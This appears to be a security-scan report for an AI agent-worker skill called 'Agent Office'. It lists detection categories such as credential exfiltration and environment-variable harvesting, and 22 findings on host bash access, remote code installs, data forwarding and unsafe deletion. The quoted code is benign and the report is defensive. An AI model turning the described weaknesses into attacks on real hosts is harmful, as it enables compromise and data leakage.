ClawHub

Agent Office

Security checks across malware telemetry and agentic risk

Overview

The skill largely does what it advertises, but it can create persistent local AI workers that run commands, install remote runtime code, store task summaries, and forward task context to other services.

Install only if you intentionally want a local multi-agent worker system. Keep workers bound to localhost, avoid broad --workspace values and custom --cli-cmd unless you trust the command, treat DeerFlow mode as capable of host command execution and file writes, do not use untrusted DeerFlow repositories or extra mounts, and only configure MEMORY_CLI or external upstream URLs when you are comfortable with task content and summaries being persisted or forwarded.

SkillSpector

By NVIDIA
Vulnerability Patterns
  • Data ExfiltrationExternal Transmission, Env Variable Harvesting, File System Enumeration
  • Privilege EscalationExcessive Permissions, Sudo/Root Execution, Credential Access
  • Excessive AgencyUnrestricted Tool Access, Autonomous Decision Making, Scope Creep
  • Behavioral ASTexec() Call, eval() Call, Dynamic Import
  • Taint TrackingDirect Taint Flow, Variable-Mediated Taint Flow, Credential Exfiltration Chain
Findings (22)

subprocess module call

Medium
Category
Dangerous Code Execution
Content
run_kwargs["input"] = prompt_text

        try:
            result = subprocess.run(cmd, **run_kwargs)
            if result.returncode == 0:
                stdout = (result.stdout or "").strip()
                stderr = (result.stderr or "").strip()
Confidence
97% confidence
Finding
result = subprocess.run(cmd, **run_kwargs)

Tainted flow: 'STATE_FILE' from os.environ.get (line 42, credential/environment) → open (file write)

Medium
Category
Data Flow
Content
def save_state(data: dict):
    with open(STATE_FILE, "w", encoding="utf-8") as f:
        json.dump(data, f, ensure_ascii=False, indent=2)
Confidence
83% confidence
Finding
with open(STATE_FILE, "w", encoding="utf-8") as f:

Tainted flow: 'worker_dir' from os.environ.get (line 586, credential/environment) → open (file write)

Medium
Category
Data Flow
Content
"EXTERNAL_UPSTREAM_URL": external_upstream_url or "-",
        },
    )
    with open(worker_dir / "SOUL.md", "w", encoding="utf-8") as f:
        f.write(rendered.strip() + "\n")
Confidence
82% confidence
Finding
with open(worker_dir / "SOUL.md", "w", encoding="utf-8") as f:

Tainted flow: 'worker_dir' from os.environ.get (line 586, credential/environment) → open (file write)

Medium
Category
Data Flow
Content
"external_mode": "bridge",
            }
        )
    with open(worker_dir / "config.json", "w", encoding="utf-8") as f:
        json.dump(config, f, ensure_ascii=False, indent=2)

    # ── 更新 state ─────────────────────────────────────
Confidence
83% confidence
Finding
with open(worker_dir / "config.json", "w", encoding="utf-8") as f:

Tainted flow: 'STATE_FILE' from os.environ.get (line 42, credential/environment) → open (file write)

Medium
Category
Data Flow
Content
"available": list(range(5011, 5021))
            }
        }
        with open(STATE_FILE, "w", encoding="utf-8") as f:
            json.dump(data, f, ensure_ascii=False, indent=2)
Confidence
84% confidence
Finding
with open(STATE_FILE, "w", encoding="utf-8") as f:

Tainted flow: 'STATE_FILE' from os.environ.get (line 21, credential/environment) → open (file write)

Medium
Category
Data Flow
Content
def save_state(data):
    with open(STATE_FILE, "w", encoding="utf-8") as f:
        json.dump(data, f, ensure_ascii=False, indent=2)
Confidence
84% confidence
Finding
with open(STATE_FILE, "w", encoding="utf-8") as f:

Lp3

Medium
Category
MCP Least Privilege
Confidence
93% confidence
Finding
The skill declares substantial capabilities—shell execution, file read/write, network access, environment use, and daemonized HTTP workers—but does not expose an explicit permissions model or user-consent boundary. That makes the skill harder to reason about and increases the chance that a user invokes behavior with broader system and data impact than expected, especially because it can create processes, bind ports, write persistent state, and interact with external tools.

Tp4

High
Category
MCP Tool Poisoning
Confidence
95% confidence
Finding
The documented purpose understates several materially risky behaviors: cloning/updating remote code from GitHub, bridging to external HTTP services, using a shared memory CLI, orchestrating multi-step flows, and enabling DeerFlow workers with host file and bash capabilities. This mismatch can cause operators to trust and deploy the skill as simple local office automation when it actually expands the attack surface to remote code supply chain, lateral data access, and command execution.

Context-Inappropriate Capability

Medium
Confidence
97% confidence
Finding
The generated runtime configuration explicitly enables broad web access, file read/write tools, and allow_host_bash: true for each worker. In an agent-office context, this gives autonomous workers capabilities to execute arbitrary host commands and interact with the network, which can lead to host compromise, data exfiltration, lateral movement, or destructive file changes if the agent is prompted maliciously or behaves unexpectedly.

Intent-Code Divergence

Medium
Confidence
92% confidence
Finding
The comment claims only the current worker's local files are exposed, but optional mounts sourced from AGENT_OFFICE_DEERFLOW_EXTRA_MOUNTS can add arbitrary existing host paths into the sandbox. This mismatch increases the chance that operators believe isolation is stronger than it is, while the worker may actually gain access to sensitive host directories beyond its own workspace.

Context-Inappropriate Capability

Medium
Confidence
95% confidence
Finding
The server writes task-derived summaries into shared memory even though its stated purpose is hosting office workers, not persisting user content into a broader memory system. This can leak sensitive prompts, outputs, or business data into another subsystem without clear user awareness or minimization controls.

Context-Inappropriate Capability

High
Confidence
99% confidence
Finding
The CLI engine allows configurable command and argument overrides, effectively transforming the worker into an arbitrary local command launcher. That capability is significantly broader than the advertised office-automation role and can be abused for unauthorized file access, persistence, or execution of attacker-chosen tools.

Intent-Code Divergence

Medium
Confidence
90% confidence
Finding
The code presents shared memory context as read-only in prompt text, but the worker later writes task-derived results back into shared memory. This mismatch is security-relevant because it defeats operator and user expectations about data flow, increasing the chance that sensitive information is persisted unintentionally.

Missing User Warnings

Medium
Confidence
90% confidence
Finding
The README explicitly states that adding a `deerflow` worker will automatically install or reuse a shared runtime, and elsewhere documents starting worker processes and writing `office_state.json`, but it does not prominently warn users that these actions modify the local system, create persistent processes, and write state under `~/.hermes/office`. In a skill whose purpose is to manage local HTTP workers and runtimes, undocumented system-changing behavior increases the risk of users triggering installs and background services without informed consent.

Missing User Warnings

Medium
Confidence
93% confidence
Finding
The `external` engine documentation says the office will inject shared-memory context when forwarding tasks to an upstream worker, but it does not clearly warn that potentially sensitive local memory or office context may be disclosed to another process or service. This is especially risky because the upstream may preserve its own memory and could be a separately managed agent, making unintended data propagation and privacy leakage more likely.

Missing User Warnings

Medium
Confidence
87% confidence
Finding
The markdown instructs creation of local HTTP workers, task dispatch over network endpoints, file creation, subprocess startup, and runtime management, but does not prominently warn about persistence, local exposure, or potential data/system modification. In a skill that manages multiple agents and can update runtimes, lack of clear warnings increases the risk of unsafe deployment and accidental exposure of sensitive workspaces or services.

Missing User Warnings

Medium
Confidence
95% confidence
Finding
The code automatically clones a remote Git repository and runs uv sync, which downloads and installs external code into a local runtime. In a security-sensitive agent framework, undisclosed bootstrap of remote code materially increases supply-chain risk and can execute untrusted dependency installation steps without meaningful user awareness or approval.

Missing User Warnings

Medium
Confidence
96% confidence
Finding
This function generates a runtime YAML that enables file-write and host bash capabilities and mounts host paths into the agent sandbox. Because these privileges are provisioned automatically and without an explicit safety gate, a compromised or misaligned worker can modify local files, run host commands, and access mounted data, which is especially dangerous in a multi-agent office automation setting.

Missing User Warnings

High
Confidence
93% confidence
Finding
The script deletes deerflow_home using a path taken from persisted worker state or a computed helper without constraining it to a safe root. If the state file is tampered with, this can cause recursive deletion of arbitrary directories accessible to the script, which is significantly more dangerous than ordinary worker cleanup.

Missing User Warnings

Medium
Confidence
95% confidence
Finding
User task content is sent to an external memory CLI for storage without any user-facing warning or consent mechanism. In a worker system that may process sensitive business tasks, this silent onward transfer creates a confidentiality and compliance risk.

Missing User Warnings

High
Confidence
98% confidence
Finding
The external engine forwards task descriptions and shared-memory context over HTTP to an upstream worker without any user-facing warning. Because this server is specifically designed to process office tasks, forwarded content may include sensitive internal data, and the forwarding text explicitly packages that context for another agent to use.

Ssd 3

Medium
Confidence
91% confidence
Finding
The forwarded description tells the external agent to retain its original identity and long-term memory, while also embedding task details and shared-memory context. That creates a natural-language data-leak pathway because sensitive information is intentionally handed to another agent context that may persist or reuse it beyond the current task.

VirusTotal

66/66 vendors flagged this skill as clean.

View on VirusTotal